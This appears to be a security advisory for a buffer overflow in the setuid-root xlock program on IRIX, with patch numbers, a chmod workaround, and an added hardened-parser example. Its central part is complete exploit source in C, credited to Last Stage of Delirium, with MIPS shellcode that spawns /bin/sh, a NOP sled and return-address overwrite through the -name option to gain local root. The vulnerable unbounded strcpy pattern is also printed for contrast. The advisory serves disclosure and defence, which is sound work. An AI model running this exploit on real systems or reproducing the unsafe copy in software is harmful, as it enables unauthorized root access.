COMMAND
/usr/bin/X11/xlock
SYSTEMS AFFECTED
IRIX
PROBLEM
The xlock(1) program locks the local X display of a system until a
correct password is entered at the keyboard. The program is installed
setuid root, and as part of locking the display it accepts user-supplied
command-line arguments that select how xlock operates.
It has been determined that an appropriately crafted set of arguments
overflows a fixed-size buffer in xlock; the exploit below does this
through the value of the -name option. Because the program runs with
root privileges, this buffer overflow is a security vulnerability:
any local user who can run xlock can use it to execute arbitrary
commands as root.
Below is exploit code for the buffer overflow. It was originally
written by the Polish group Last Stage of Delirium (LSD). Exploit follows:
/* copyright by */
/* Last Stage of Delirium, Dec 1996, Poland*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#define BUFSIZE 2072            /* bytes of NOP sled plus shellcode */
#define OFFS (800+512+128)      /* guessed distance from our $sp to the sled inside xlock */
#define ADDRS 0x100             /* number of return-address copies appended after the sled */
#define ALIGN 2                 /* shift so the 4-byte addresses line up in xlock's frame */
/* MIPS shellcode, free of NUL bytes: builds "/bin/sh\0" on the stack,
   argv = {"/bin/sh", NULL}, envp = NULL, then execve (IRIX syscall 1059 = 0x423) */
char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c";
/* "li t7,0x1234": a NUL-free MIPS no-op used as sled filler */
char nop[]="\x24\x0f\x12\x34";
void run(char *buf) {
    /* the overlong value is handed to xlock as the -name argument */
    execl("/usr/bin/X11/xlock","lsd","-name",buf,NULL);
    printf("execl failed\n");
}
/* "move v0,sp; jr ra; nop; nop": called as a function this returns our own $sp,
   from which the exploit guesses where the sled will sit on xlock's stack */
char jump[]="\x03\xa0\x10\x25\x03\xe0\x00\x08\x24\x0f\x12\x34\x24\x0f\x12\x34";
int main(int argc, char *argv[]) {
    char *buf, *ptr, addr[8];
    int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN;
    int i, noplen=strlen(nop);
    if (argc >1) bufsize=atoi(argv[1]);
    if (argc >2) offs=atoi(argv[2]);
    if (argc >3) addrs=atoi(argv[3]);
    if (argc >4) align=atoi(argv[4]);
    if (bufsize<strlen(asmcode)) {
        printf("bufsize too small, code is %d bytes long\n", (int)strlen(asmcode));
        exit(1);
    }
    /* leading nop + sled + addrs return addresses + NUL
       (the original sized this with ADDRS, which overran for addrs > ADDRS) */
    if ((buf=malloc(bufsize+(addrs<<2)+noplen+1))==NULL) {
        printf("Can't malloc\n");
        exit(1);
    }
    /* target return address: our $sp plus offs, expected to land in the sled */
    *(int *)addr=(*(unsigned long(*)())jump)()+offs;
    printf("address=%#x\n",*(unsigned int *)addr);
    strcpy(buf,nop);
    ptr=buf+noplen;
    buf+=4-align;                 /* shift the start so addresses are word aligned in the target */
    for(i=0;i<bufsize;i++)        /* NOP sled ... */
        *ptr++=nop[i%noplen];
    memcpy(ptr-strlen(asmcode),asmcode,strlen(asmcode));   /* ... ending in the shellcode */
    for(i=0;i<(addrs<<2);i++)     /* followed by the return address, repeated */
        *ptr++=addr[i%sizeof(int)];
    *ptr=0;
    printf("buflen=%d\n",(int)strlen(buf));
    fflush(stdout);
    /* gp value is set here: the saved $gp slot also lies inside the overwritten
       region; the constants are stack offsets the authors measured on their system */
    ptr=buf+ALIGN+(0x7fff22c0-0x7fff1ea0);
    *(int *)addr=(*(unsigned long(*)())jump)()+OFFS+(0x7fff3828-0x7fff3468)+32476;
    for(i=0;i<4;i++)
        *ptr++=addr[i&3];
    run(buf);
    return 0;
}
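For contrast with the exploit, the following is an added example, not xlock's source (which this advisory does not show), of the bug class described above beside a hardened replacement: an unbounded strcpy of an option value into a fixed-size buffer next to a bounded parser that rejects overlong -name values, plus an early privilege drop so that argument parsing never runs with root's effective uid. NAME_BUF, struct xopts, parse_args, set_name_bounded, set_name_unbounded and drop_privs are names chosen for this example; the buffer size is arbitrary.

```c
/* Added example, not SGI's xlock code. Names and sizes are hypothetical. */
#define _XOPEN_SOURCE 700
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define NAME_BUF 128            /* hypothetical fixed-size resource-name buffer */

struct xopts {
    char name[NAME_BUF];
    int  parsed;
};

/* VULNERABLE pattern (kept only for contrast; never called here): the
 * option value is copied with no bound, so a value longer than
 * NAME_BUF-1 bytes overwrites whatever follows the buffer. In a
 * setuid-root program that is a root shell for whoever runs it. */
void set_name_unbounded(struct xopts *o, const char *value)
{
    strcpy(o->name, value);
}

/* Hardened: bounded copy that rejects, rather than silently truncates,
 * overlong input. Returns 0 on success, -1 if value does not fit. */
static int set_name_bounded(struct xopts *o, const char *value)
{
    size_t n = strlen(value);
    if (n >= sizeof o->name)
        return -1;
    memcpy(o->name, value, n + 1);
    return 0;
}

/* Parse argv in the "-name <resource>" style xlock uses.
 * Returns 0 on success, -1 on any malformed, unknown or overlong option. */
static int parse_args(int argc, char *const argv[], struct xopts *o)
{
    memset(o, 0, sizeof *o);
    for (int i = 1; i < argc; i++) {
        if (strcmp(argv[i], "-name") == 0) {
            if (i + 1 >= argc)
                return -1;                  /* missing value */
            if (set_name_bounded(o, argv[++i]) != 0)
                return -1;                  /* overlong value: fail closed */
        } else {
            return -1;                      /* unknown option */
        }
    }
    o->parsed = 1;
    return 0;
}

/* Second line of defence: a setuid program should give up its effective
 * privileges before it looks at attacker-controlled argv, and take them
 * back only around the one operation that needs them (the password check).
 * Returns 0 when the effective uid now equals the real uid. */
static int drop_privs(void)
{
    if (seteuid(getuid()) != 0)
        return -1;
    return geteuid() == getuid() ? 0 : -1;
}

int main(int argc, char *argv[])
{
    struct xopts o;
    if (drop_privs() != 0) {
        perror("seteuid");
        return 1;
    }
    if (parse_args(argc, argv, &o) != 0) {
        fprintf(stderr, "usage: %s [-name resource]\n", argv[0]);
        return 2;
    }
    printf("resource name: \"%s\"\n", o.name[0] ? o.name : "(default)");
    return 0;
}
```

Run unprivileged the program simply echoes the name; the point is that a 4 KB -name value is refused before it reaches any fixed-size buffer, and that even a bug in the parser would execute with the caller's own uid. A real setuid program would call seteuid(0) again only around the password check and drop root permanently with setuid(getuid()) once it is no longer needed; only the initial drop is shown here.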
SOLUTION
Although patches are available for this issue, there may be situations
where installing them immediately is not possible. As an interim
workaround, remove the setuid bit from the xlock program:
# /bin/chmod 500 /usr/bin/X11/xlock
Verify with ls -l /usr/bin/X11/xlock, which should now show the mode as
-r-x------ with owner root. Mode 500 makes xlock executable by root
only, so no unprivileged user can invoke the program at all and the
overflow can no longer be used to gain root; the cost is that ordinary
users cannot lock their displays until the patch is installed.
Patches are:
OS Version   Vulnerable?   Patch #     Other Actions
----------   -----------   ---------   -------------
IRIX 3.x     no
IRIX 4.x     no
IRIX 5.0.x   yes           not avail   Note 1
IRIX 5.1.x   yes           not avail   Note 1
IRIX 5.2     yes           not avail   Note 1
IRIX 5.3     yes           2090
IRIX 6.0.x   yes           not avail   Note 1
IRIX 6.1     yes           not avail   Note 1
IRIX 6.2     yes           2090
IRIX 6.3     yes           2090
IRIX 6.4     yes           2091
Note 1: no patch is available for this release; upgrade the operating
system or change the permissions of xlock as shown above.